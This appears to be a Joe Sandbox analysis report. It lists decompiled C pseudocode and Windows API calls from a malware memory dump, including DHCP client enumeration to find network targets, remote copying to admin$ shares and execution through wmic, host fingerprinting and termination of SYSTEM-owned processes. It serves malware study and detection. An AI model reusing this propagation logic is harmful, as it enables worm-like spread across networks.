                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32 ref: 007B9D8A
                                                                                                                                                                                        • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 007B9DAA
                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 007B9DB7
                                                                                                                                                                                        • wsprintfW.USER32 ref: 007B9DD8
                                                                                                                                                                                        • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 007B9E24
                                                                                                                                                                                        • CreateProcessW.KERNEL32 ref: 007B9E2C
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 007B9E3B
                                                                                                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 007B9E4B
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E59
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E63
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E6D
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E77
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000104), ref: 007B9E81
                                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 007B9E99
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 007B9EA6
                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 007B9EC5
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B9ED7
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B9EE4
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,76B5C0B0,00000000), ref: 007B68EB
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B68F4
                                                                                                                                                                                          • Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6921
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000008,?,74654D40), ref: 007B6946
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapAlloc.KERNEL32(00000000), ref: 007B6949
                                                                                                                                                                                          • Part of subcall function 007B68B5: memcpy.MSVCRT ref: 007B6978
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 007B6995
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B6998
                                                                                                                                                                                          • Part of subcall function 007B68B5: GetProcessHeap.KERNEL32(00000000,?), ref: 007B699F
                                                                                                                                                                                          • Part of subcall function 007B68B5: HeapFree.KERNEL32(00000000), ref: 007B69A2
                                                                                                                                                                                        • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 007B9EF9
                                                                                                                                                                                        • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,007B9FCE,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000003,?), ref: 007B9F17
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                                                                                                                                        • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                                                                                                                                        • API String ID: 659518118-2685502051
                                                                                                                                                                                        • Opcode ID: 0c90158c84ac73c9c373b55f8eb737069118f8e7c3344132d1641ce551ba46cb
                                                                                                                                                                                        • Instruction ID: bedfb7a681dfb6271774d34ac95572ba15a833f966678e5d98b578caca79eec5
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c90158c84ac73c9c373b55f8eb737069118f8e7c3344132d1641ce551ba46cb
                                                                                                                                                                                        • Instruction Fuzzy Hash: 81B1F771900219EFCF61DFA4CC88FEEBBB9BF44314F14456AE619A2120E7389A84DF55
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 17%
                                                                                                                                                                                        			E007B8D39(intOrPtr _a4) {
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                        				char _v584;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                        				intOrPtr* _t85;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                        				intOrPtr* _t89;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t83 = 0;
                                                                                                                                                                                        				_t88 = 0;
                                                                                                                                                                                        				_v48 = 0;
                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                                        				_v56 = 0x104;
                                                                                                                                                                                        				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
                                                                                                                                                                                        				_t58 =  &_v584;
                                                                                                                                                                                        				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
                                                                                                                                                                                        				if(_t58 != 0) {
                                                                                                                                                                                        					L15:
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t61 =  *_v12;
                                                                                                                                                                                        				_v60 = _t61;
                                                                                                                                                                                        				if(_t61 <= 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					__imp__DhcpRpcFreeMemory(_v12);
                                                                                                                                                                                        					goto L15;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					_t64 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                                                        					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
                                                                                                                                                                                        					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
                                                                                                                                                                                        						_t71 =  *((intOrPtr*)(_v12 + 4));
                                                                                                                                                                                        						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
                                                                                                                                                                                        						if(_t71 != 0) {
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t73 =  *_v16;
                                                                                                                                                                                        						_v52 = _t73;
                                                                                                                                                                                        						if(_t73 == 0 || _t88 >= _t73) {
                                                                                                                                                                                        							L12:
                                                                                                                                                                                        							__imp__DhcpRpcFreeMemory(_v16);
                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
                                                                                                                                                                                        								if(_t89 != 0) {
                                                                                                                                                                                        									_push( *_t89);
                                                                                                                                                                                        									_t85 = __imp__#14;
                                                                                                                                                                                        									if(E007BA567( *_t85()) != 0) {
                                                                                                                                                                                        										__imp__#12( *_t85( *_t89));
                                                                                                                                                                                        										_t86 = E007B641A(_t78);
                                                                                                                                                                                        										if(_t86 != 0) {
                                                                                                                                                                                        											E007B6B95(_t79, 0, _a4);
                                                                                                                                                                                        											HeapFree(GetProcessHeap(), 0, _t86);
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t88 = _v24 + 1;
                                                                                                                                                                                        								_v24 = _t88;
                                                                                                                                                                                        							} while (_t88 < _v52);
                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L13:
                                                                                                                                                                                        					_t83 = _v28 + 1;
                                                                                                                                                                                        					_v28 = _t83;
                                                                                                                                                                                        				} while (_t83 < _v60);
                                                                                                                                                                                        				goto L14;
                                                                                                                                                                                        			}






























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,7404C4E0,00000000), ref: 007B8D80
                                                                                                                                                                                        • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 007B8DA2
                                                                                                                                                                                        • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 007B8DCE
                                                                                                                                                                                        • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 007B8E07
                                                                                                                                                                                        • htonl.WS2_32(00000000), ref: 007B8E36
                                                                                                                                                                                        • htonl.WS2_32(00000000), ref: 007B8E44
                                                                                                                                                                                        • inet_ntoa.WS2_32(00000000), ref: 007B8E47
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
                                                                                                                                                                                          • Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
                                                                                                                                                                                          • Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
                                                                                                                                                                                          • Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 007B8E65
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B8E6C
                                                                                                                                                                                        • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 007B8E81
                                                                                                                                                                                        • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 007B8E9A
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 4121633671-3175316637
                                                                                                                                                                                        • Opcode ID: dc8f6a93adee31791339dfcc7c42e396f08073a1bacb6bac896949b243690bfd
                                                                                                                                                                                        • Instruction ID: e122dd0c82d35ae19a3129bced7a63731965bcbe0ad78da6addd888b221c0bb0
                                                                                                                                                                                        • Opcode Fuzzy Hash: dc8f6a93adee31791339dfcc7c42e396f08073a1bacb6bac896949b243690bfd
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6341B6B5D00219AFCB11DFA9D884EDEBBBCFF48300F148156E501E7220EB789A41CB65
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E007B57E5(long _a4, void _a8, void* _a12, intOrPtr _a16) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				int _v20;
                                                                                                                                                                                        				struct _TIME_ZONE_INFORMATION _v192;
                                                                                                                                                                                        				void** _t62;
                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                        				long _t69;
                                                                                                                                                                                        				signed int _t73;
                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                        				void* _t96;
                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                        				long _t102;
                                                                                                                                                                                        				int _t103;
                                                                                                                                                                                        				void _t104;
                                                                                                                                                                                        				void _t105;
                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                        				void* _t107;
                                                                                                                                                                                        				void* _t108;
                                                                                                                                                                                        				int _t109;
                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                        				void* _t116;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t109 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				if(_a16 != 0) {
                                                                                                                                                                                        					_t96 = LocalAlloc(0x40, 0xf0);
                                                                                                                                                                                        					_v12 = _t96;
                                                                                                                                                                                        					if(_t96 != 0) {
                                                                                                                                                                                        						 *_t96 = _a8;
                                                                                                                                                                                        						 *((intOrPtr*)(_t96 + 4)) = GetSystemDefaultLCID();
                                                                                                                                                                                        						if(GetTimeZoneInformation( &_v192) != 0xffffffff) {
                                                                                                                                                                                        							 *(_t96 + 8) = _v192.Bias;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t10 = _t96 + 0xc; // 0xc
                                                                                                                                                                                        						memcpy(_t10, _a12, 0x21);
                                                                                                                                                                                        						_t116 = _t115 + 0xc;
                                                                                                                                                                                        						_t62 =  &_v16;
                                                                                                                                                                                        						_v16 = _t109;
                                                                                                                                                                                        						__imp__NetWkstaGetInfo(0x7c0494, 0x64, _t62, _t111);
                                                                                                                                                                                        						if(_t62 == 0) {
                                                                                                                                                                                        							_t114 = _v16;
                                                                                                                                                                                        							if( *(_t114 + 8) != _t109) {
                                                                                                                                                                                        								_t91 =  *(_t114 + 8);
                                                                                                                                                                                        								_t108 = _t91 + 2;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t105 =  *_t91;
                                                                                                                                                                                        									_t91 = _t91 + 2;
                                                                                                                                                                                        								} while (_t105 != _t109);
                                                                                                                                                                                        								_t109 = (_t91 - _t108 >> 1) + (_t91 - _t108 >> 1) + 2;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t101 = 0;
                                                                                                                                                                                        							if( *(_t114 + 4) != 0) {
                                                                                                                                                                                        								_t88 =  *(_t114 + 4);
                                                                                                                                                                                        								_t107 = _t88 + 2;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t104 =  *_t88;
                                                                                                                                                                                        									_t88 = _t88 + 2;
                                                                                                                                                                                        								} while (_t104 != 0);
                                                                                                                                                                                        								_t101 = (_t88 - _t107 >> 1) + (_t88 - _t107 >> 1) + 2;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if(_t109 != 0 && _t109 <= 0xc3) {
                                                                                                                                                                                        								memcpy(_v12 + 0x2d,  *(_t114 + 8), _t109);
                                                                                                                                                                                        								_t116 = _t116 + 0xc;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if(_t101 != 0 && _t101 <= 0xc3 - _t109) {
                                                                                                                                                                                        								_t29 = _v12 + 0x2d; // 0x2d
                                                                                                                                                                                        								memcpy(_t109 + _t29,  *(_t114 + 4), _t101);
                                                                                                                                                                                        								_t116 = _t116 + 0xc;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							NetApiBufferFree(_t114);
                                                                                                                                                                                        							_t96 = _v12;
                                                                                                                                                                                        							_t109 = 0;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_a12 = _t109;
                                                                                                                                                                                        						_v8 = _t109;
                                                                                                                                                                                        						if(E007B56D8( &_v8, _a4, _t96,  &_a12) != 0) {
                                                                                                                                                                                        							_t69 = _v8 + 9;
                                                                                                                                                                                        							_a4 = _t69;
                                                                                                                                                                                        							_t113 = LocalAlloc(0x40, _t69);
                                                                                                                                                                                        							if(_t113 != _t109) {
                                                                                                                                                                                        								 *(_t113 + 1) = _a8;
                                                                                                                                                                                        								 *_t113 = 0x66;
                                                                                                                                                                                        								_t41 = _t113 + 5; // 0x5
                                                                                                                                                                                        								_t73 = memcpy(_t41, _a12, _v8);
                                                                                                                                                                                        								_t103 = _v8;
                                                                                                                                                                                        								_t106 = _t103 + 5;
                                                                                                                                                                                        								_t74 = _t73 | 0xffffffff;
                                                                                                                                                                                        								_t110 = _t113;
                                                                                                                                                                                        								if(_t106 != 0) {
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t74 = _t74 >> 0x00000008 ^  *(0x7c3078 + (( *_t110 & 0x000000ff ^ _t74) & 0x000000ff) * 4);
                                                                                                                                                                                        										_t110 = _t110 + 1;
                                                                                                                                                                                        										_t106 = _t106 - 1;
                                                                                                                                                                                        									} while (_t106 != 0);
                                                                                                                                                                                        									_t96 = _v12;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								 *(_t113 + _t103 + 5) =  !_t74;
                                                                                                                                                                                        								_v20 = E007B5780(_t103, _t113, _a4, _a16);
                                                                                                                                                                                        								LocalFree(_t113);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t102 = 0xf0;
                                                                                                                                                                                        						_t66 = _t96;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							 *_t66 = 0;
                                                                                                                                                                                        							_t66 = _t66 + 1;
                                                                                                                                                                                        							_t102 = _t102 - 1;
                                                                                                                                                                                        						} while (_t102 != 0);
                                                                                                                                                                                        						LocalFree(_t96);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x007b58a3
                                                                                                                                                                                        0x007b58ac
                                                                                                                                                                                        0x007b58ac
                                                                                                                                                                                        0x007b58b2
                                                                                                                                                                                        0x007b58c7
                                                                                                                                                                                        0x007b58cc
                                                                                                                                                                                        0x007b58cc
                                                                                                                                                                                        0x007b58d1
                                                                                                                                                                                        0x007b58e5
                                                                                                                                                                                        0x007b58ea
                                                                                                                                                                                        0x007b58ef
                                                                                                                                                                                        0x007b58ef
                                                                                                                                                                                        0x007b58f3
                                                                                                                                                                                        0x007b58f9
                                                                                                                                                                                        0x007b58fc
                                                                                                                                                                                        0x007b58fc
                                                                                                                                                                                        0x007b5909
                                                                                                                                                                                        0x007b590c
                                                                                                                                                                                        0x007b5916
                                                                                                                                                                                        0x007b591b
                                                                                                                                                                                        0x007b5921
                                                                                                                                                                                        0x007b592a
                                                                                                                                                                                        0x007b592e
                                                                                                                                                                                        0x007b5933
                                                                                                                                                                                        0x007b5936
                                                                                                                                                                                        0x007b593c
                                                                                                                                                                                        0x007b5943
                                                                                                                                                                                        0x007b5948
                                                                                                                                                                                        0x007b594b
                                                                                                                                                                                        0x007b5951
                                                                                                                                                                                        0x007b5954
                                                                                                                                                                                        0x007b5958
                                                                                                                                                                                        0x007b595a
                                                                                                                                                                                        0x007b5968
                                                                                                                                                                                        0x007b596f
                                                                                                                                                                                        0x007b5970
                                                                                                                                                                                        0x007b5970
                                                                                                                                                                                        0x007b5973
                                                                                                                                                                                        0x007b5973
                                                                                                                                                                                        0x007b597e
                                                                                                                                                                                        0x007b5989
                                                                                                                                                                                        0x007b598c
                                                                                                                                                                                        0x007b598c
                                                                                                                                                                                        0x007b592e
                                                                                                                                                                                        0x007b5992
                                                                                                                                                                                        0x007b5997
                                                                                                                                                                                        0x007b599a
                                                                                                                                                                                        0x007b599a
                                                                                                                                                                                        0x007b599d
                                                                                                                                                                                        0x007b599e
                                                                                                                                                                                        0x007b599e
                                                                                                                                                                                        0x007b59a2
                                                                                                                                                                                        0x007b59a2
                                                                                                                                                                                        0x007b59a8
                                                                                                                                                                                        0x007b59ae

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 007B5805
                                                                                                                                                                                        • GetSystemDefaultLCID.KERNEL32 ref: 007B581D
                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 007B582D
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B584B
                                                                                                                                                                                        • NetWkstaGetInfo.NETAPI32(007C0494,00000064,?), ref: 007B5861
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B58C7
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B58EA
                                                                                                                                                                                        • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 007B58F3
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 007B5924
                                                                                                                                                                                        • memcpy.MSVCRT ref: 007B5943
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 007B598C
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 007B59A2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2529142246-0
                                                                                                                                                                                        • Opcode ID: 0a39d90b406feda998e8275bbe02637dcb7a10c8abc7545437dec6b342289924
                                                                                                                                                                                        • Instruction ID: b20317f9d52e37e4031fdbe545145722a57ef1227c3d54dfb1def7c39a794b84
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a39d90b406feda998e8275bbe02637dcb7a10c8abc7545437dec6b342289924
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C51BF7190070AEFDB20DF68CC84FEABBA9FF48314F058569E9559B251E778EA10CB50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                        			E007B841D(int _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v24;
                                                                                                                                                                                        				long _t20;
                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                        				long* _t31;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(( *0x7c7bc0 & 0x00000002) != 0) {
                                                                                                                                                                                        					_t20 = GetCurrentProcessId();
                                                                                                                                                                                        					if(_a4 != _t20) {
                                                                                                                                                                                        						_t21 = OpenProcess(0x401, 0, _a4);
                                                                                                                                                                                        						_t38 = _t21;
                                                                                                                                                                                        						if(_t38 != 0) {
                                                                                                                                                                                        							if(OpenProcessToken(_t38, 0xe,  &_v16) != 0) {
                                                                                                                                                                                        								if(DuplicateToken(_v16, 2,  &_v12) != 0) {
                                                                                                                                                                                        									_v24.Value = 0;
                                                                                                                                                                                        									_v20 = 0x500;
                                                                                                                                                                                        									if(AllocateAndInitializeSid( &_v24, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
                                                                                                                                                                                        										_t31 =  &_a4;
                                                                                                                                                                                        										_a4 = 0;
                                                                                                                                                                                        										__imp__CheckTokenMembership(_v12, _v8, _t31);
                                                                                                                                                                                        										if(_t31 != 0 && _a4 != 0) {
                                                                                                                                                                                        											TerminateProcess(_t38, 0);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										FreeSid(_v8);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									CloseHandle(_v12);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								CloseHandle(_v16);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t21 = CloseHandle(_t38);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						return _t21;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t20;
                                                                                                                                                                                        			}












                                                                                                                                                                                        0x007b84e9
                                                                                                                                                                                        0x007b8439
                                                                                                                                                                                        0x007b84eb

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,007B8555,?,?), ref: 007B8430
                                                                                                                                                                                        • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,007B8555,?,?), ref: 007B844C
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,007B8555,?,?), ref: 007B8464
                                                                                                                                                                                        • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,007B8555,?,?), ref: 007B847D
                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B84A3
                                                                                                                                                                                        • CheckTokenMembership.ADVAPI32(?,?,?), ref: 007B84BA
                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007B84CB
                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 007B84D4
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 007B84DD
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,007B8555,?,?), ref: 007B84E2
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,007B8555,?,?), ref: 007B84E5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2191316301-0
                                                                                                                                                                                        • Opcode ID: 8c70a0a0cec7e759b764b5654fa9c1de6ec07194a685ec838999abb6b03c0231
                                                                                                                                                                                        • Instruction ID: 46d23b690306a084b1ca45259583d6dbbb3c93ddbbb3214c66e3c27868c3beae
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c70a0a0cec7e759b764b5654fa9c1de6ec07194a685ec838999abb6b03c0231
                                                                                                                                                                                        • Instruction Fuzzy Hash: F221187590014DBFEB60AFA4DC88FAE7B7CEF04781F008126FA01A1060EB788E45DB65
